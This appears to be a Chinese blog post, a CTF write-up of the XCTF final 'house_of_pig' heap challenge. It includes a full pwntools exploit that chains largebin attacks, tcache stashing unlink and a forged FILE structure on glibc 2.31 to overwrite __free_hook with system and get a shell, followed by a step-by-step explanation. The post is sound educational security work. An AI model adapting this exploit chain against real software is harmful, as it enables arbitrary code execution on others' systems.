house of pig

最新推荐文章于 2024-10-08 20:27:53 发布
最新推荐文章于 2024-10-08 20:27:53 发布
阅读量194 收藏
点赞数 9
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/127858326
版权

前言

很早之前就做了 xctf final 的 house_of_pig 这个题,不过一直没来得及分析,今天再看看代码分析一下。代码逆向部分主要参考house of pig详解_陈子政的博客-CSDN博客

利用条件

1.largebin attack

2.UAF

3.tcache_stashing_unlink

largebin attack可参考house of pig详解_陈子政的博客-CSDN博客

这里说一下tcache_stashing_unlink的原理:先在tcache bin中放入5个chunk,再在smallbin中放入两个chunk。将最后进入smallbin中的chunk的bk指针修改为目标地址-0x10,再将目标地址+0x8的位置设置为一个指向可写内存的指针。

这里主要用到calloc函数,与malloc不同,这个calloc函数调用时不会从tcache里分配空闲的chunk,并且calloc会进行初始化。

由此,我们申请堆块时,就会触发tcache_stashing_unlink,将smallbin中的chunk连接到tcachebin中。

例题分析

漏洞分析

 主要功能有申请,释放,编辑,打印。功能5是切换不同的角色。

 在delete函数里存在uaf漏洞

 

 在角色3中的add函数里多了一个gift,多申请一个大小0xe8的堆块。触发条件就是使用角色三创建五个堆块,在创建第五个堆块时触发。

在change函数中有一个md5加密,直接拿别的师傅解密过的用了。

 

exp

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
r = process('./pig')
elf=ELF('./pig')
libc = ELF('/home/ubuntulyp/桌面/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc.so.6')

def info(a,b):
    log.info("\033[0;33;40m"+a+hex(b)+'\033[0m')

def menu(cmd):
    r.sendlineafter('Choice: ', str(cmd))

def add(size, content):
    menu(1)
    r.sendlineafter('size: ', str(size))
    r.sendafter('message: ', content)

def show(idx):
    menu(2)
    r.sendlineafter('index: ', str(idx))

def edit(idx, content):
    menu(3)
    r.sendlineafter('index: ', str(idx))
    r.sendafter('message: ', content)

def free(idx):
    menu(4)
    r.sendlineafter('index: ', str(idx))

def change(user):
    menu(5)
    if user == 1:
        r.sendlineafter('user:\n', 'A\x01\x95\xc9\x1c')
    elif user == 2:
        r.sendlineafter('user:\n', 'B\x01\x87\xc3\x19')
    elif user == 3:
        r.sendlineafter('user:\n', 'C\x01\xf7\x3c\x32')


#--------------------prepare for tcache stashing unlink attack-------------
change(2)
for i in range(5):#B0-B4
    add(0x90,'a'*0x30)
    free(i)
change(1)
add(0x130,'a'*0x60)#A0
for i in range(1,8):#A1-A7
    add(0x130,'a'*0x60)
    free(i)
free(0)
change(2)
add(0x90,'a'*0x30)#B5
change(1)
add(0x150,'k'*0x70)#A8,0xc80
for i in range(9,16):#A9-A15
    add(0x150,'a'*0x70)
    free(i)
free(8)
change(2)
add(0xb0,'a'*0x30)#B6
change(1)
add(0x430,'a'*0x160)#A16

# #-----------------------leak libc and heap address-------------------------
change(2)
add(0xf0,'a'*0x50)#B7
change(1)
free(16)
change(2)
change(1)
show(16)
r.recvuntil("The message is: ")
libcbase=u64(r.recv(6).ljust(8,b'\x00'))-96-0x10-libc.sym["__malloc_hook"]
info("libcbase->",libcbase)
system=libcbase+libc.sym['system']
info("system->",system)
free_hook=libcbase+libc.sym['__free_hook']
IO_list_all = libcbase + libc.sym['_IO_list_all']
change(2)
show(1)
r.recvuntil("The message is: ")
heapbase=u64(r.recv(6).ljust(8,b'\x00'))-0x1eb0
info("heapbase->",heapbase)

#-----------------first  large bin attack---------------------------#
add(0x440,'a'*0x160)#B8
change(1)
add(0x430,'a'*0x160)#A17
add(0x430,'a'*0x160)#A18
add(0x430,'a'*0x160)#A19
change(2)
free(8)
add(0x450,'a'*0x170)#B9
change(1)
free(17)
change(2)
edit(8,p64(0)+p64(free_hook-0x28)+b'\n')
print("free_hook--------------------------------",hex(free_hook))
change(3)
add(0xa0,'a'*0x30)#C0
change(2)
edit(8,p64(heapbase+0x3c00)*2+b'\n')
#----------------second large bin attack---------------------------
change(3)
add(0x380,'a'*0x120)#C1
change(1)
free(19)
change(2)
edit(8,p64(0)+p64(IO_list_all-0x20)+b'\n')
change(3)
add(0xa0,'a'*0x30)#C2
change(2)
edit(8,p64(heapbase+0x3c00)*2+b'\n')

#----------------tcache stashing unlink attack----------------------#
change(1)
fd=heapbase+0x2260
edit(8,b'b'*0x40+p64(fd)+p64(free_hook-0x20)+b'\n')
change(3)
payload = b'a'*0x18 + p64(heapbase+0x4540)
payload = payload.ljust(0x160, b'\x00')
add(0x440, payload)#c3
add(0x90,b'a'*0x30)#c4,one more

str_jumps=libcbase+0x1ed560
fake_IO_FILE = 2*p64(0)
fake_IO_FILE += p64(1) #_IO_write_base = 1
fake_IO_FILE += p64(0xffffffffffff) #_IO_write_ptr = 0xffffffffffff
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(heapbase+0x4620)                #_IO_buf_base
fake_IO_FILE += p64(heapbase+0x4638)                #_IO_buf_end
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00')
fake_IO_FILE += p64(0)                    #change _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(str_jumps)        #change vtable
payload = fake_IO_FILE + b'/bin/sh\x00' + p64(0)+p64(system)
r.sendafter('Gift:', payload)
gdb.attach(r)
menu(5)
r.sendlineafter('user:\n', '')
# gdb.attach(r)
r.interactive()

代码分析

change(2)
for i in range(5):#B0-B4
    add(0x90,'a'*0x30)
    free(i)
change(1)
add(0x130,'a'*0x60)#A0
for i in range(1,8):#A1-A7
    add(0x130,'a'*0x60)
    free(i)
free(0)
change(2)
add(0x90,'a'*0x30)#B5
change(1)
add(0x150,'k'*0x70)#A8,0xc80
for i in range(9,16):#A9-A15
    add(0x150,'a'*0x70)
    free(i)
free(8)
change(2)
add(0xb0,'a'*0x30)#B6
change(1)
add(0x430,'a'*0x160)#A16

这里先向tcache bin里释放5个0x90大小的堆块,然后释放8个0x130的堆块,其中A0堆块进入unsortedbin,通过计算大小,在申请0x90大小的堆块,剩下0x90在unsortedbin中,再申请一个大堆块让其进入smallbin中

 同样操作再释放一个堆块进入smallbin中,注意这里为了不用再额外申请堆块泄露libc,第二次申请大堆块直接申请一个size在unsortedbin中的。

 

change(2)
add(0xf0,'a'*0x50)#B7
change(1)
free(16)
change(2)
change(1)
show(16)
r.recvuntil("The message is: ")
libcbase=u64(r.recv(6).ljust(8,b'\x00'))-96-0x10-libc.sym["__malloc_hook"]
info("libcbase->",libcbase)
system=libcbase+libc.sym['system']
info("system->",system)
free_hook=libcbase+libc.sym['__free_hook']
IO_list_all = libcbase + libc.sym['_IO_list_all']
change(2)
show(1)
r.recvuntil("The message is: ")
heapbase=u64(r.recv(6).ljust(8,b'\x00'))-0x1eb0
info("heapbase->",heapbase)

 为了防止堆块合并,先申请B7,然后释放A16进入unsortedbin中,泄露libc和heapbase。

 

add(0x440,'a'*0x160)#B8
change(1)
add(0x430,'a'*0x160)#A17
add(0x430,'a'*0x160)#A18
add(0x430,'a'*0x160)#A19
change(2)
free(8)
add(0x450,'a'*0x170)#B9
change(1)
free(17)
change(2)
edit(8,p64(0)+p64(free_hook-0x28)+b'\n')
print("free_hook--------------------------------",hex(free_hook))
change(3)
add(0xa0,'a'*0x30)#C0
change(2)
edit(8,p64(heapbase+0x3c00)*2+b'\n')

这里进行第一次largebin attack,先将B8堆块释放进入unsortedbin中,然后申请一个大于B8的堆块将其放入largebin中,再释放一个小于B8的堆块进入unsortedbin,编辑B8的bk->nextsize为free_hook-0x28,再申请一个小堆块触发largebin attack,向free_hook-0x8的位置写入B8堆块的地址。

change(3)
add(0x380,'a'*0x120)#C1
change(1)
free(19)
change(2)
edit(8,p64(0)+p64(IO_list_all-0x20)+b'\n')
change(3)
add(0xa0,'a'*0x30)#C2
change(2)
edit(8,p64(heapbase+0x3c00)*2+b'\n')

同理这里通过largebin attack将_IO_list_all改为B8堆块的地址。

 

change(1)
fd=heapbase+0x2260
edit(8,b'b'*0x40+p64(fd)+p64(free_hook-0x20)+b'\n')
change(3)
payload = b'a'*0x18 + p64(heapbase+0x4540)
payload = payload.ljust(0x160, b'\x00')
add(0x440, payload)#c3
add(0x90,b'a'*0x30)#c4,one more

接下来触发tcache stashing unlink attack

先将smallbin中的堆块的指针修改,使其指向free_hook-0x20。注意这里的A8堆块是最开始被切割堆块的上一个,通过计算使其正好覆盖到smallbin中的堆块并修改指针。

 

 

我们实际修改的是0x562e82f7bbc0堆块。 

此时我们看到由于unsortedbin和largebin中都有chunk,因此我们直接申请0x90的堆块是不行的,这里我们申请一个大小为0x440的堆块,首先unsortedbin判断不满足大小,将unsortedbin中的堆块放入smallbin中,然后再将largebin中的空闲chunk分配出去。

然后申请一个0x90的堆块触发tcache stashing unlink attack

 这里特别注意一下这个0x440的堆块,它就是我们之前largebin attack中往_IO_list_all中写入的堆地址,因此我们要对这个堆块进行伪造fake file,使其chain指向我们布置的另一个file结构体的地址(也就是gift中申请的地址,接着往下看)

str_jumps=libcbase+0x1ed560
fake_IO_FILE = 2*p64(0)
fake_IO_FILE += p64(1) #_IO_write_base = 1
fake_IO_FILE += p64(0xffffffffffff) #_IO_write_ptr = 0xffffffffffff
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(heapbase+0x4620)                #_IO_buf_base
fake_IO_FILE += p64(heapbase+0x4638)                #_IO_buf_end
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00')
fake_IO_FILE += p64(0)                    #change _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(str_jumps)        #change vtable
payload = fake_IO_FILE + b'/bin/sh\x00' + p64(0)+p64(system)
r.sendafter('Gift:', payload)
gdb.attach(r)
menu(5)
r.sendlineafter('user:\n', '')
r.interactive()

这就是我们往gift创建的堆块中伪造的file结构体

地址正好是heapbase+0x4540 。

对于file结构体的构造原理:

将其 vtable 由 _IO_file_jumps 修改为 _IO_str_jumps,则原本应该调用 IO_file_overflow 的时候,就会去调用 IO_str_overflow。

看看IO_str_overflow函数的实现:

int
_IO_str_overflow (FILE *fp, int c)
{
  int flush_only = c == EOF;
  size_t pos;
  if (fp->_flags & _IO_NO_WRITES)
      return flush_only ? 0 : EOF;
  if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
    {
      fp->_flags |= _IO_CURRENTLY_PUTTING;
      fp->_IO_write_ptr = fp->_IO_read_ptr;
      fp->_IO_read_ptr = fp->_IO_read_end;
    }
  pos = fp->_IO_write_ptr - fp->_IO_write_base;
  if (pos >= (size_t) (_IO_blen (fp) + flush_only))
    {
      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
    return EOF;
      else
    {
      char *new_buf;
      char *old_buf = fp->_IO_buf_base;
      size_t old_blen = _IO_blen (fp);
      size_t new_size = 2 * old_blen + 100;
      if (new_size < old_blen)
        return EOF;
      new_buf = malloc (new_size);
      if (new_buf == NULL)
        {
          /*      __ferror(fp) = 1; */
          return EOF;
        }
      if (old_buf)
        {
          memcpy (new_buf, old_buf, old_blen);
          free (old_buf);
          /* Make sure _IO_setb won't try to delete _IO_buf_base. */
          fp->_IO_buf_base = NULL;
        }
      memset (new_buf + old_blen, '\0', new_size - old_blen);
 
      _IO_setb (fp, new_buf, new_buf + new_size, 1);
      fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
      fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
      fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
      fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);
 
      fp->_IO_write_base = new_buf;
      fp->_IO_write_end = fp->_IO_buf_end;
    }
    }
 
  if (!flush_only)
    *fp->_IO_write_ptr++ = (unsigned char) c;
  if (fp->_IO_write_ptr > fp->_IO_read_end)
    fp->_IO_read_end = fp->_IO_write_ptr;
  return c;
}

看到io_str_overflow调用了malloc,memcpy,free等函数。

size_t new_size = 2 * old_blen + 100;
size_t old_blen = _IO_blen (fp);
#define _IO_blen(fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base)

这里是new_size的计算公式,我们看到,只要合理控制_IO_buf_end和_IO_buf_base即可控制malloc的大小。

我们可以通过 IO_str_overflow 函数中的memcpy 写入到刚刚申请出来的包含__free_hook的这个 chunk,从而能任意控制__free_hook,将其修改为system,然后再布置其参数为'/bin/sh\x00'即可。在最后, IO_str_overflow会free掉_IO_buf_base指向的chunk,从而触发system。

调试一下

调用链:exit====>__run_exit_handlers=====>_IO_cleanup====>_IO_flush_all_lockp====>

_IO_str_overflow

si进入

 

si进入

 

 si进入

 

si进入

 

si进入,这里rdi为最后gift申请的那个堆块

 

成功伪造size的大小,使其申请tcachebin中的free_hook-0x10位置的chunk 

 

 

 这里将_IO_buf_base指向的数据拷贝到了free_hook-0x10的位置

 

 这时free_hook被修改成system。

并且rdi修改为'/bin/sh'

 

最后调用free函数get  shell !

 

KingKi1L3r
关注
house of pig详解
Test网络安全
09-05 4997
在复现这题之前需要了解一些前置知识:libc2.31下的largebin_attack,tcache_stashing_unlink plus以及高版本glibc下的IO_FILE攻击 首先看到libc2.31下的largebin_attack 0x1.libc2.31下的largebin_attack 跟随how2heap项目中的largebin_attack以及源码调试来学习。 从libc2.30开始,largebin的插入代码中新增了两个检查 先看到第一个点 将uns.
house of pig 攻击手法详解
weixin_46483787的博客
02-03 1638
在这里学习一下学长提出来的一种攻击手段,适用与libc-2.31及以上版本,本质上是通过 libc2.31 下的 largebin attack以及 FILE 结构利用,来配合 libc2.31 下的 tcache stashing unlink attack 进行组合利用的方法。主要适用于程序中仅有 calloc 函数来申请 chunk,而没有调用 malloc 函数的情况。
【PWN】House of Orange&House of Pig(待完整例题)
u014377094的博客
05-06 692
House of Orange House of Orange的利用背景在缺少free条件。为了达到free的效果,通过修改top chunk的size位,当malloc的空间大于top chunk时触发brk,使top chunk被放置在unsorted bin。 利用条件: 1.堆有 mmap 和 brk 两种分配方式,我们需要让堆以 brk 的形式拓展,之后原有的 top chunk 会被置于 unsorted bin 中。要实现 brk 拓展 top chunk,但是要实现这个目的需要绕过一.
House of pig 原理详解&实战
qq_41252520的博客
08-29 1287
该方法适用于glibc-2.31及其以上版本,基本原理是综合glibc-2.31下的、IO_FILE结构和这三种利用手法,常用于目标程序中使用calloccalloc代替mallocmalloc分配内存的情形下。该方法的核心在于glibc中的IO_str_overflowIO_str_overflow函数内会连续调用mallocmalloc、memcpymemcpy、...
[阅读型]glibc-2.31中的tcache stashing unlink与large bin attack
easy_level1的博客
06-01 1798
文章目录前言题目的漏洞与功能tcache stashing unlinklarge bin attack有了上述方法,然后做什么 前言 有幸和校队一起参加21年5月的xctf-final。笔者爆肝连续战斗十小时,在与队友各种讨论下艰难做出了house of pig这一题。事后看出题人的wp,方法不尽相同但也是收获良多,特此记录。 笔者的这题解法是没有large bin attack的(知识盲区),利用tcache stashing unlink写global_max_fast完成house of hust,
【技术分享】house of pig一个新的堆利用详解 .pdf
09-05
【技术分享】House of Pig是一种新的堆利用技术,主要针对xctf 2021决赛中的同名挑战。此攻击方法适用于glibc 2.31及其后的版本,利用了其中的大型bin攻击(largebin attack)、FILE结构以及tcache stashing unlink...
house of Emma
weixin_46483787的博客
02-08 2217
前言 鸽了好久总算来复现了,由于从libc2.34开始,取消了两个常用的hook,这给我们的攻击带来了很大的困难,于是wjh找到了一种新的攻击方式,这是一种基于一条适用于 GLIBC 2.34 及以下所有版本的 IO_File 调用链进行攻击的手法。 前置知识 (一)largebin attack 见我的另一篇文章:house of pig 攻击手法详解 (二)house of kiwi 当程序没有显示调用exit,也不会通过主函数返回,那么以往我们使用的FSOP就无法进行了,如果此时两个hook也没法利用
House of apple 一种新的glibc中IO攻击方法
pythonxxoo的博客
06-18 2974
目录* House of apple 一种新的glibc中IO攻击方法 + 前言 + 利用条件 + 利用原理 + 利用思路 - 思路一:修改线程变量 - 思路二:修改结构体 - 思路三:修改线程变量之 - 思路四:修改全局变量 + 例题分析 - 题目分析 - 利用过程 + 总结提出一种新的中利用思路,暂且命名为。众所周知,高版本逐渐移除了等等一众全局变量,中题对钩子的利用将逐渐成为过去式。而想要在高版本利用成功,基本上就离不开对结构体的伪造与流的攻击。之前很多师傅都提出了一些优秀的攻击方法,比如house
【tcache stash unlink +】图解
huzai9527的博客
11-09 369
tcache stashing unlink + tcache 的入链操作 smallbin 入链操作 tcache stash 源码 #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache
Tcache Stashing Unlink Attack
seaaseesa的博客
05-01 1997
Tcache Stashing Unlink Attack Tcache Stashing Unlink Attack就是calloc的分配不从tcache bin里取chunk,calloc会遍历fastbin、small bin、large bin,如果在tcache bin里,对应的size的bin不为空,则会将这些bin的chunk采用头插法插入到tcache bin里。首先,我们来看一...
好好说话之Tcache Attack(3):tcache stashing unlink attack
hollk’s blog
02-03 2233
tcache stashing unlink attack这种攻击利用有一个稍微绕的点,就是small bin中的空闲块挂进tcache bin这块。弯不大,仔细想想就好了
task【XTuner微调个人小助手认知】
m0_53291740的博客
10-07 776
下面我们将根据项目的需求一步步的进行修改和调整吧!在 PART 1 的部分,由于我们不再需要在 HuggingFace 上自动下载模型,因此我们先要更换模型的路径以及数据集的路径为我们本地的路径。为了训练过程中能够实时观察到模型的变化情况,XTuner 贴心的推出了一个。
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 552
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python
文本区域分割系统源码&数据集分享
最新发布
lzmlzm89的博客
10-08 1068
数据集信息展示在现代计算机视觉领域,文本区域分割的研究日益受到重视,尤其是在处理文档图像和名片等场景时。为此,我们构建了一个名为“more2”的数据集,旨在为改进YOLOv8-seg模型提供丰富的训练素材,以提升其在文本区域分割任务中的表现。该数据集包含五个类别,具体包括“0”、“2”、“business-name-card”、“doc”和“wendang”,每个类别均具有独特的特征和应用场景,能够为模型的训练提供多样化的样本。
pytorch版本和cuda版本不匹配问题
分享计算机视觉,C++,网络摄像头研发,音视频开发,嵌入式等知识。
10-06 414
发现cuda11.8支持pytorch2.0.0。
Python编写的贪吃蛇小游戏
WwLK123的博客
10-03 618
Python编写贪吃蛇小游戏。
micropython中断处理程序设计-临界区
sjh2100的博客
10-08 249
代码的临界区的示例是访问多个变量,这些变量受ISR影响。若中断在对单个变量的访问间发生,则其值将会不一致。这是一种叫作”竞态条件”的问题的实例:ISR和主程序循环争相修改变量。如上所述,若在主代码中修改了Python内置类型的实例或在ISR中访问实例,则应多加注意。执行更改的代码应被视为临界区,以确保ISR运行时实例处于有效状态。这样的IRQ对IRQ(例如,堆可能被锁定)中运行的代码进行了限制,并预定一个稍后会回调的函数能够接触这些限制。在实时系统中,这可能会导致极少的、难以预测的故障。
Python并发编程(1)——Python并发编程的几种实现方式
一点
10-03 1069
Python 并发编程是指在 Python 中编写能够同时执行多个任务的程序。并发编程在任何一门语言当中都是比较难的,因为会涉及各种各样的问题,在Python当中也不例外。Python 提供了多种方式来实现并发,包括多线程(threading)、多进程(multiprocessing)、异步编程(asyncio),以及一些高级用法concurrent.futures和第三方库如gevent。
堆漏洞深入解析:House of Spirit与House of Lore
"这篇文档是关于堆漏洞分析的‘house系列’第一部分,主要讨论了House of Spirit和House of Lore两种技术。文章基于CentOS 6.10 32位系统,内核版本2.6.32,gcc 4.4.7,gdb 7.2和libc 2.12。作者提到了先前关于glibc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值